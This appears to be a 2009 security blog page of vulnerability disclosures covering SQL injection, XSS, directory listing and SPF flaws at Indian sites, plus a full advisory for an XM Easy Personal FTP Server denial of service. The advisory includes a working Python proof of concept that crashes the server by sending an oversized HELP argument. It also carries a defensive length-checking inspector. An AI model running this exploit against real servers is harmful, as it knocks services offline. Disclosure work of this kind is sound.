Bypassing URL filtering for flickr in Dubai
// August 14th, 2009 // 1 Comment » // Disclosures
The Great Wall of Dubai – Access to flickr hacked!!!
Author: Simran Gambhir
For detailed information click here to download pdf.
// August 13th, 2009 // No Comments » // Disclosures
Outlook Money (http://money.outlookindia.com/): directory listing allowed and open access to users’ personal information, including name, address, e-mail, phone no., mobile no., etc.
Author: Raxit Sheth
For detailed information click here to download pdf.
// July 30th, 2009 // No Comments » // Disclosures
Author: Neeraj Thakar
Link to the author’s post:
http://hypersecurity.blogspot.com/2009/06/xm-personal-ftp-server-vulnerability.html
BID: http://www.securityfocus.com/bid/35239
Credits:
NeerajT of Nevis Labs
http://www.nevisnetworks.com/services.php?id=10
Date of Discovery: 14-May-2009
Vendor: Dxmsoft
URL: http://www.dxm2008.com/
Affected:
XM Easy Personal FTP Server 5.7.0
Earlier versions may also be affected
Overview:
XM Easy Personal FTP Server is an easy-to-use FTP server application. Multiple denial-of-service vulnerabilities exist in XM Personal FTP Server that cause the application to crash when a long list of arguments is sent to certain FTP commands post-authentication.
Details:
The DoS vulnerability exists because the application fails to handle large parameter values sent to certain FTP commands such as HELP or TYPE. When a long value (> 4700 bytes) is passed as a parameter to these commands, the FTP server cannot process it and crashes. Note that this is a post-authentication vulnerability, so a user must be logged in to exploit it. No registers are overwritten, hence remote code execution may not be possible.
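A defensive check for the condition described above, as an added example that is not part of the original advisory or the vendor's code: it splits a client-to-server FTP control stream into commands and flags any whose argument exceeds a length limit, including lines that never terminate. The class name `FtpCommandInspector` and the 512-byte `MAX_ARG_LEN` are assumptions chosen for illustration; the sample input is constructed.

```python
# Added example: flag oversized FTP command arguments on the control channel.
# MAX_ARG_LEN is an assumed policy value, not a figure taken from the advisory.
MAX_ARG_LEN = 512
VERB_SLACK = 8  # room for the command verb and the separating space


class FtpCommandInspector:
    """Incrementally splits a client->server FTP control stream into
    line-terminated commands and reports any whose argument is too long."""

    def __init__(self, max_arg_len=MAX_ARG_LEN):
        self.max_arg_len = max_arg_len
        self.buf = b""
        self.discarding = False  # True while skipping the tail of an oversized line

    def feed(self, data):
        """Consume raw bytes; return a list of (verb, length, verdict) tuples."""
        findings = []
        self.buf += data
        while True:
            line, sep, rest = self.buf.partition(b"\n")
            if not sep:
                # No terminator yet: never buffer an unbounded line.
                too_long = len(self.buf) > self.max_arg_len + VERB_SLACK
                if too_long and not self.discarding:
                    verb = self.buf.split(b" ", 1)[0][:VERB_SLACK]
                    findings.append((verb.decode("ascii", "replace").upper(),
                                     len(self.buf), "oversized-unterminated"))
                    self.discarding = True
                if self.discarding:
                    self.buf = b""
                return findings
            self.buf = rest
            if self.discarding:
                # This is the tail of a line that was already reported.
                self.discarding = False
                continue
            verb, _, arg = line.rstrip(b"\r").partition(b" ")
            verdict = "oversized" if len(arg) > self.max_arg_len else "ok"
            findings.append((verb.decode("ascii", "replace").upper(),
                             len(arg), verdict))


if __name__ == "__main__":
    # Constructed sample traffic: a normal login line, then an overlong HELP.
    sample = b"USER test\r\nHELP " + b"A" * 5000 + b"\r\nTYPE I\r\n"
    for finding in FtpCommandInspector().feed(sample):
        print(finding)
```

A filtering proxy or IDS rule built on this would drop or reset the session on any verdict other than `ok` before the line reaches the server.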
Severity:
High
Solution:
No patches available from vendor
No workaround is available at this time
Vendor Communication Timelines:
05.14.2009 – Vulnerability Discovered
05.15.2009 – Vendor Notified
05.20.2009 – No Response, Vendor Notified again
06.05.2009 – No Ack from Vendor, Public Disclosure
PoC: Python Exploit
—————————————————–
#!/usr/bin/python
#
# ::::::::::::::::::::::::::::::[neeraj(.)thakar(at)nevisnetworks(.)com]
#
# [-] What:....[ XM Easy Personal FTP Server 5.7.0 ].....
# [-] Where:...[ http://www.dxm2008.com ]...............
# [-] When:....[ 14-May-2009 ]..........................
# [-] Who:.....[ NeerajT | neeraj(.)thakar(at)nevisnetworks(.)com ]....
# [-] How:.....[
# A Denial of service vulnerability exists in XM
# Personal FTP Server that causes the application to
# crash when a long list of arguments is sent to
# certain FTP commands post authentication..........]
# [-] Thankz:..[ Jambalaya, Xin and Chintan ]............
import os
import sys
import time
from ftplib import FTP

def usage():
    print("[...XM Personal FTP Server 5.7.0 DoS Exploit...]")
    print("[.........neeraj(.)thakar(at)gmail(.)com..............]\n")
    print("Usage: ./XMPersonal_FTPServer_DoSPoC.py <server-ip> <username> <password>\n")
    print("\n Use it at your own risk ! This is just a PoC. I am not responsible for damages done by your crazy thinking..\n")

# The Main function starts here..
if __name__ == "__main__":
    ftpport = '21'
    # get the args.. (script name plus three arguments are required)
    if len(sys.argv) < 4:
        usage()
        sys.exit(1)
    ftpserver = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]
    sys.stdout.write("Connecting to " + ftpserver + " using " + user + ".... ")
    # Try opening a connection to the FTP server
    # (the timeout must be passed at connect time to apply to the socket)
    try:
        F = FTP(ftpserver, timeout=3)
        print('Connected !')
    except Exception:
        print("\nCould not connect to the Server\n")
        sys.exit(1)
    # Lets create the Buffer..
    crap = "A" * 5000
    # Creat'in da'bomb
    dabomb = 'HELP ' + crap
    print("Press any key to login..")
    ch = sys.stdin.read(1)
    # Lets login
    try:
        F.login(user, passwd)
    except Exception:
        print("Oops.. Looks like you forgot to create a login !!\n")
        F.quit()
        sys.exit(1)
    sys.stdout.write("Target Locked, Press any key to fire.. ")
    ch = sys.stdin.read(1)
    print('Sendin Da\'Bomb..')
    try:
        F.sendcmd(dabomb)
    except Exception:
        # An error here means the server stopped answering
        print('Target destroyed !! Mission successfull..!')
    print('Returning to base..')
    F.close()
    sys.exit(0)
—————————————————–
// May 10th, 2009 // No Comments » // Disclosures
The corporate login option on the Idea Cellular website was vulnerable to an SQL injection attack. It was reported to Idea Cellular staff on 17th March 2009 and fixed on 23rd March 2009. They had initially informed us that it would take them around 8 days to fix it; surprisingly, they fixed it in 7. Does it actually take that much time?
For detailed information click here to download pdf.
// May 10th, 2009 // No Comments » // Disclosures
The Kosmix.com search option is vulnerable to XSS. It was originally reported to the Kosmix staff on 16th April 2009, but they have not replied on this issue.
For detailed information click here to download pdf.
// May 10th, 2009 // 1 Comment » // Disclosures
Rediff's normal search and job search suffer from an XSS vulnerability. It was reported to Rediff on 14th April 2009, but there has been no response from Rediff staff on this issue.
For detailed information click here to download pdf.
// May 10th, 2009 // No Comments » // Disclosures
The email alerts from HDFC fail SPF authentication because HDFC’s TXT records are not configured properly.
For detailed information click here to download pdf.